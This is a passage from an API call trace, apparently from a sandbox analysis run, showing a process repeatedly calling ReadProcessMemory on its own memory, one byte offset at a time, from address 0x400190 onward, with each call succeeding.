lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.618] GetLastError () returned 0x0 [0303.618] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400190, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.619] GetLastError () returned 0x0 [0303.619] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400191, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.619] GetLastError () returned 0x0 [0303.619] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400192, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.619] GetLastError () returned 0x0 [0303.619] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400193, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.619] GetLastError () returned 0x0 [0303.619] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400194, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.619] GetLastError () returned 0x0 [0303.619] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400195, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.619] GetLastError () returned 0x0 [0303.619] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400196, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.619] GetLastError () returned 0x0 [0303.619] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400197, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.619] GetLastError () returned 0x0 [0303.619] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400198, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.619] GetLastError () returned 0x0 [0303.619] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400199, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.619] GetLastError () returned 0x0 [0303.619] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40019a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.619] GetLastError () returned 0x0 [0303.619] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40019b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.619] GetLastError () returned 0x0 [0303.619] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40019c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.619] GetLastError () returned 0x0 [0303.619] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40019d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.619] GetLastError () returned 0x0 [0303.619] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40019e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.619] GetLastError () returned 0x0 [0303.619] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40019f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.619] GetLastError () returned 0x0 [0303.619] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a0, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.619] GetLastError () returned 0x0 [0303.619] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a1, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.619] GetLastError () returned 0x0 [0303.619] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a2, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.619] GetLastError () returned 0x0 [0303.619] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a3, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.619] GetLastError () returned 0x0 [0303.619] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a4, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.619] GetLastError () returned 0x0 [0303.619] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a5, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.619] GetLastError () returned 0x0 [0303.620] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a6, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.620] GetLastError () returned 0x0 [0303.620] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a7, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.620] GetLastError () returned 0x0 [0303.620] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a8, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.620] GetLastError () returned 0x0 [0303.620] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a9, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.620] GetLastError () returned 0x0 [0303.620] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001aa, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.620] GetLastError () returned 0x0 [0303.620] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ab, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.620] GetLastError () returned 0x0 [0303.620] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ac, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.620] GetLastError () returned 0x0 [0303.620] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ad, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.620] GetLastError () returned 0x0 [0303.620] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ae, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.620] GetLastError () returned 0x0 [0303.620] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001af, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.620] GetLastError () returned 0x0 [0303.620] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b0, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.620] GetLastError () returned 0x0 [0303.620] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b1, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.620] GetLastError () returned 0x0 [0303.620] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b2, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.620] GetLastError () returned 0x0 [0303.620] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b3, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.620] GetLastError () returned 0x0 [0303.620] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b4, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.620] GetLastError () returned 0x0 [0303.620] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b5, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.620] GetLastError () returned 0x0 [0303.620] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b6, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.620] GetLastError () returned 0x0 [0303.620] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b7, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.620] GetLastError () returned 0x0 [0303.620] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b8, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.620] GetLastError () returned 0x0 [0303.620] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b9, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.620] GetLastError () returned 0x0 [0303.620] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ba, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.620] GetLastError () returned 0x0 [0303.620] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001bb, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.620] GetLastError () returned 0x0 [0303.620] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001bc, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.621] GetLastError () returned 0x0 [0303.621] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001bd, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.621] GetLastError () returned 0x0 [0303.621] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001be, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.621] GetLastError () returned 0x0 [0303.621] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001bf, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.621] GetLastError () returned 0x0 [0303.621] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c0, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.621] GetLastError () returned 0x0 [0303.621] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c1, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.621] GetLastError () returned 0x0 [0303.621] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c2, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.621] GetLastError () returned 0x0 [0303.621] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c3, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.621] GetLastError () returned 0x0 [0303.621] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c4, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.621] GetLastError () returned 0x0 [0303.621] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c5, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.621] GetLastError () returned 0x0 [0303.621] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c6, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.621] GetLastError () returned 0x0 [0303.621] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c7, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.621] GetLastError () returned 0x0 [0303.621] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c8, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.621] GetLastError () returned 0x0 [0303.621] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c9, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.621] GetLastError () returned 0x0 [0303.621] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ca, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.621] GetLastError () returned 0x0 [0303.621] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001cb, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.621] GetLastError () returned 0x0 [0303.621] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001cc, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.621] GetLastError () returned 0x0 [0303.621] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001cd, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.621] GetLastError () returned 0x0 [0303.621] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ce, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.622] GetLastError () returned 0x0 [0303.622] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001cf, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.622] GetLastError () returned 0x0 [0303.622] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d0, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.622] GetLastError () returned 0x0 [0303.622] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d1, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.622] GetLastError () returned 0x0 [0303.622] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d2, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.622] GetLastError () returned 0x0 [0303.622] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d3, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.622] GetLastError () returned 0x0 [0303.622] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d4, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.622] GetLastError () returned 0x0 [0303.622] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d5, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.622] GetLastError () returned 0x0 [0303.622] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d6, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.622] GetLastError () returned 0x0 [0303.622] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d7, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.622] GetLastError () returned 0x0 [0303.622] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d8, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.622] GetLastError () returned 0x0 [0303.622] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d9, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.622] GetLastError () returned 0x0 [0303.622] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001da, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.622] GetLastError () returned 0x0 [0303.622] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001db, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.622] GetLastError () returned 0x0 [0303.622] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001dc, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.622] GetLastError () returned 0x0 [0303.622] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001dd, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.622] GetLastError () returned 0x0 [0303.622] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001de, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.622] GetLastError () returned 0x0 [0303.622] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001df, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.622] GetLastError () returned 0x0 [0303.622] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e0, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.622] GetLastError () returned 0x0 [0303.622] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e1, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.622] GetLastError () returned 0x0 [0303.622] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e2, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.622] GetLastError () returned 0x0 [0303.622] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e3, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.622] GetLastError () returned 0x0 [0303.622] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e4, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.622] GetLastError () returned 0x0 [0303.622] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e5, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.623] GetLastError () returned 0x0 [0303.623] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e6, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.623] GetLastError () returned 0x0 [0303.623] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e7, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.623] GetLastError () returned 0x0 [0303.623] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e8, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.623] GetLastError () returned 0x0 [0303.623] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001e9, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.623] GetLastError () returned 0x0 [0303.623] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ea, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.623] GetLastError () returned 0x0 [0303.623] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001eb, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.623] GetLastError () returned 0x0 [0303.623] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ec, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.623] GetLastError () returned 0x0 [0303.623] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ed, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.623] GetLastError () returned 0x0 [0303.623] ReadProcessMemory (in: hProcess=0xffffffff, 